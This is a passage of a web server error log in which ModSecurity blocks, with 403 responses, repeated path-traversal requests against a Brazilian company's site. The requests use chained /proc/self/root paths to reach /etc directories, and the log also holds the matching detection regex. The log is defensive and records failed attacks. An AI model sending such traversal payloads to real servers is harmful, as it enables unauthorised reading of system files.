"abqQMQkwaGbbGflqUZD77wAAAMg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:44:51.671008 2026] [:error] [pid 19507:tid 140411725141760] [client 74.7.243.128:42404] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqQM9Y0UrI5A3LftIyMBAAAAYI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:44:53.347130 2026] [:error] [pid 19507:tid 140411641214720] [client 74.7.243.128:42418] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqQNdY0UrI5A3LftIyMBQAAAYw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:44:56.776076 2026] [:error] [pid 19507:tid 140411666392832] [client 74.7.243.128:42418] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqQONY0UrI5A3LftIyMCgAAAYk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:44:59.265611 2026] [:error] [pid 31803:tid 140411725141760] [client 74.7.243.128:42420] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqQO-yqAr6etmhZHNqpJQAAAEI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:45:02.412092 2026] [:error] [pid 15051:tid 140411548894976] [client 74.7.243.128:56410] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqQPimAPhZkrhU8w4lYmgAAAJc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:45:04.164350 2026] [:error] [pid 31803:tid 140411557287680] [client 74.7.243.128:56420] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqQQOyqAr6etmhZHNqpJgAAAFY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:45:10.171000 2026] [:error] [pid 30077:tid 140411658000128] [client 74.7.243.128:56422] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqQRvu8EFLIOrSqIpvwlAAAAko"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:45:12.433917 2026] [:error] [pid 17887:tid 140411632822016] [client 74.7.243.128:41398] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqQRwkwaGbbGflqUZD7_gAAAM0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:45:15.655728 2026] [:error] [pid 30077:tid 140411599251200] [client 74.7.243.128:41410] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqQS_u8EFLIOrSqIpvwmQAAAlE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:45:17.156328 2026] [:error] [pid 17887:tid 140411649607424] [client 74.7.243.128:41416] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqQTQkwaGbbGflqUZD8AQAAAMs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:45:18.827330 2026] [:error] [pid 17887:tid 140411599251200] [client 74.7.243.128:41428] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqQTgkwaGbbGflqUZD8BQAAANE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:45:22.404384 2026] [:error] [pid 30077:tid 140411725141760] [client 74.7.243.128:39560] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqQUvu8EFLIOrSqIpvwogAAAkI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:45:24.819564 2026] [:error] [pid 19507:tid 140411582465792] [client 74.7.243.128:39562] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqQU9Y0UrI5A3LftIyMVgAAAZM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:45:27.067318 2026] [:error] [pid 31803:tid 140411624429312] [client 74.7.243.128:39570] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqQV-yqAr6etmhZHNqpOAAAAE4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:45:30.412388 2026] [:error] [pid 31803:tid 140411683178240] [client 74.7.243.128:39576] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqQWuyqAr6etmhZHNqpQwAAAEc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:45:30.499746 2026] [:error] [pid 26799:tid 140411607643904] [client 74.7.241.31:56482] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqQWta6ubjKNq_cu4aD9QAAA1A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 08:45:34.078913 2026] [:error] [pid 29882:tid 140411599251200] [client 74.7.241.31:49568] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqQXUzinOy1jxa1j4f_KQAAARE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 08:45:34.087513 2026] [:error] [pid 19507:tid 140411683178240] [client 74.7.243.128:43364] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqQXNY0UrI5A3LftIyMZwAAAYc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:45:35.881411 2026] [:error] [pid 30077:tid 140411565680384] [client 74.7.243.128:43366] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqQX_u8EFLIOrSqIpvwrQAAAlU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:45:37.185573 2026] [:error] [pid 26799:tid 140411565680384] [client 74.7.243.128:43380] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqQYda6ubjKNq_cu4aD-wAAA1U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:45:40.427035 2026] [:error] [pid 26799:tid 140411683178240] [client 74.7.243.128:43388] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqQZNa6ubjKNq_cu4aEAQAAA0c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
